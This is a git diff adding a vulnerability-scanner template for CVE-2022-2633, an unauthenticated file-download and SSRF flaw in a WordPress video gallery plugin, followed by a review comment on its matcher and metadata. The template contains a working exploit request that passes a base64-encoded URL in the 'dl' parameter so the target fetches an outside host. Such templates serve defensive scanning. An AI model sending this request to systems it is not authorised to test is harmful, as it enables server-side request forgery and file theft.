diff --git a/cves/2022/CVE-2022-2633.yaml b/cves/2022/CVE-2022-2633.yaml
new file mode 100644
index 0000000000..2665ed463c
--- /dev/null
+++ b/cves/2022/CVE-2022-2633.yaml
@@ -0,0 +1,36 @@
+id: CVE-2022-2633
+
+info:
+ name: All In One Video Gallery Plugin - Unauthenticated Arbitrary File Download & SSRF vulnerability
+ author: theamanrawat
+ description: |
+ Unauthenticated Arbitrary File Download & SSRF vulnerability in WordPress All In One Video Gallery Plugin (versions <= 2.6.0).
+ reference:
+ - https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994
+ - https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html
+ - https://wordpress.org/plugins/all-in-one-video-gallery/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2633
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-2633
+ classification:
+ cve-id: CVE-2022-2633
+ metadata:
+ verified: true
+ tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,all-in-one-video-gallery,ssrf
+
+requests:
+ - raw:
+ - |
+ @timeout: 10s
+ GET /index.php/video/?dl={{base64('http://interact.sh/')}} HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Interactsh Server'
+
+ - type: status
+ status:
+ - 200
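Review bot: The request line hard-codes `http://interact.sh/` as the fetch destination and the word matcher keys on that site's landing-page text `'Interactsh Server'`, so the result depends on a third-party host the scan operator does not control. A target with restricted egress, or any change to that landing page, gives a false negative, and every scanned host is made to contact the public domain even when the operator runs a private OAST server. Consider the engine's `{{interactsh-url}}` placeholder with a matcher on `part: interactsh_protocol` and the word `"http"`, which confirms the callback itself; whether the placeholder can be nested inside `base64()` should be checked against the engine version in use. Separately, the `info` block has no `severity` field and `classification` carries only `cve-id`; both should be filled in from the NVD entry already listed under `reference` so the finding can be filtered and triaged.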